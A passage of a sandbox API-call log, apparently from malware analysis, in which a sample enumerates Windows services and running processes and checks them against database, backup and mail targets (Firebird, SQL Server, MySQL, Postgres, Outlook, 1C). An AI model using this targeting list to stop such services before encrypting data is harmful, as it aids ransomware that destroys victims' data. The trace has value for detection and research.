	[0043.055] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0043.055] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0043.055] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0043.055] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0043.055] lstrlenW (lpString="ProfSvc") returned 7
	[0043.055] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0043.055] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0043.055] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0043.055] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0043.055] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0043.055] lstrlenW (lpString="RpcEptMapper") returned 12
	[0043.055] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0043.055] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0043.055] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0043.055] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0043.055] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0043.055] lstrlenW (lpString="RpcSs") returned 5
	[0043.055] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0043.055] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0043.055] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0043.055] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0043.056] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0043.056] lstrlenW (lpString="SamSs") returned 5
	[0043.056] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0043.056] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0043.056] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0043.056] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0043.056] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0043.056] lstrlenW (lpString="Schedule") returned 8
	[0043.056] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0043.056] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0043.056] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0043.056] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0043.056] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0043.056] lstrlenW (lpString="SENS") returned 4
	[0043.056] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0043.056] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0043.056] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0043.056] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0043.056] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0043.056] lstrlenW (lpString="ShellHWDetection") returned 16
	[0043.056] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0043.056] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0043.056] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0043.056] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0043.056] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0043.056] lstrlenW (lpString="Spooler") returned 7
	[0043.056] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0043.056] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0043.056] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0043.056] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0043.056] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0043.056] lstrlenW (lpString="swprv") returned 5
	[0043.056] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1
	[0043.056] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1
	[0043.057] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1
	[0043.057] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1
	[0043.057] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1
	[0043.057] lstrlenW (lpString="SysMain") returned 7
	[0043.057] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0043.057] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0043.057] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0043.057] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0043.057] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0043.057] lstrlenW (lpString="Themes") returned 6
	[0043.057] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0043.057] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0043.057] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0043.057] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0043.057] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0043.057] lstrlenW (lpString="TrkWks") returned 6
	[0043.057] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0043.057] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0043.057] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0043.057] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0043.057] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0043.057] lstrlenW (lpString="UxSms") returned 5
	[0043.057] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0043.057] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0043.057] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0043.057] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0043.057] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0043.057] lstrlenW (lpString="VSS") returned 3
	[0043.057] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0043.057] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0043.057] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0043.057] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0043.057] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0043.057] lstrlenW (lpString="WdiServiceHost") returned 14
	[0043.058] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0043.058] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0043.058] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0043.058] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0043.058] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0043.058] lstrlenW (lpString="WdiSystemHost") returned 13
	[0043.058] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0043.058] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0043.058] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0043.058] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0043.058] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0043.058] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0043.058] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0043.058] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0043.058] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0043.058] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0043.058] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0043.058] lstrlenW (lpString="Winmgmt") returned 7
	[0043.058] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0043.058] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0043.058] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0043.058] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0043.058] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0043.058] lstrlenW (lpString="WPDBusEnum") returned 10
	[0043.058] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0043.058] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0043.058] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0043.058] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0043.058] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0043.058] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4b70c0 | out: hHeap=0x7d60000) returned 1
	[0043.058] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c0
	[0043.061] Process32FirstW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0043.061] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0043.061] lstrlenW (lpString="System") returned 6
	[0043.061] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0043.061] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0043.061] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0043.061] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0043.061] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0043.062] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0043.062] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0043.062] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0043.062] lstrlenW (lpString="smss.exe") returned 8
	[0043.062] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0043.062] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0043.062] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0043.062] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0043.062] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0043.062] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0043.062] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0043.062] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0043.063] lstrlenW (lpString="csrss.exe") returned 9
	[0043.063] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0043.063] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0043.063] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0043.063] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0043.063] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0043.063] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0043.063] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0043.063] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0043.063] lstrlenW (lpString="wininit.exe") returned 11
	[0043.063] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0043.064] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0043.064] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0043.064] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0043.064] lstrlenW (lpString="csrss.exe") returned 9
	[0043.064] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0043.065] lstrlenW (lpString="winlogon.exe") returned 12
	[0043.065] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0043.065] lstrlenW (lpString="services.exe") returned 12
	[0043.065] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0043.065] lstrlenW (lpString="lsass.exe") returned 9
	[0043.066] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0043.066] lstrlenW (lpString="lsm.exe") returned 7
	[0043.066] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0043.066] lstrlenW (lpString="svchost.exe") returned 11
	[0043.066] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0043.067] lstrlenW (lpString="svchost.exe") returned 11
	[0043.067] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0043.067] lstrlenW (lpString="svchost.exe") returned 11
	[0043.067] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0043.068] lstrlenW (lpString="svchost.exe") returned 11
	[0043.068] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0043.068] lstrlenW (lpString="svchost.exe") returned 11
	[0043.068] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0043.069] lstrlenW (lpString="audiodg.exe") returned 11
	[0043.069] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0043.069] lstrlenW (lpString="svchost.exe") returned 11
	[0043.069] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0043.070] lstrlenW (lpString="svchost.exe") returned 11
	[0043.070] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0043.070] lstrlenW (lpString="dwm.exe") returned 7
	[0043.070] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0043.071] lstrlenW (lpString="explorer.exe") returned 12
	[0043.071] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0043.071] lstrlenW (lpString="spoolsv.exe") returned 11
	[0043.071] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0043.072] lstrlenW (lpString="taskhost.exe") returned 12
	[0043.072] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0043.072] lstrlenW (lpString="svchost.exe") returned 11
	[0043.072] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0043.073] lstrlenW (lpString="taskeng.exe") returned 11
	[0043.073] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0043.073] lstrlenW (lpString="taskhost.exe") returned 12
	[0043.073] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0043.074] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0043.074] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0043.074] lstrlenW (lpString="python tragedy.exe") returned 18
	[0043.074] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0043.075] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0043.075] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0043.075] lstrlenW (lpString="computers.exe") returned 13
	[0043.075] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0043.076] lstrlenW (lpString="separated.exe") returned 13
	[0043.076] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0043.076] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0043.076] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0043.077] lstrlenW (lpString="darkness.exe") returned 12
	[0043.077] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0043.077] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0043.077] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0043.077] lstrlenW (lpString="sophisticated.exe") returned 17
	[0043.078] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0043.078] lstrlenW (lpString="wishlist.exe") returned 12
	[0043.078] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0043.079] lstrlenW (lpString="top.exe") returned 7
	[0043.079] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0043.079] lstrlenW (lpString="implemented.exe") returned 15
	[0043.079] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0043.080] lstrlenW (lpString="comp.exe") returned 8
	[0043.080] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0043.080] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0043.080] Process32NextW (in: hSnapshot=0x1c0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0043.081] lstrlenW (lpString="solved.exe") returned 10
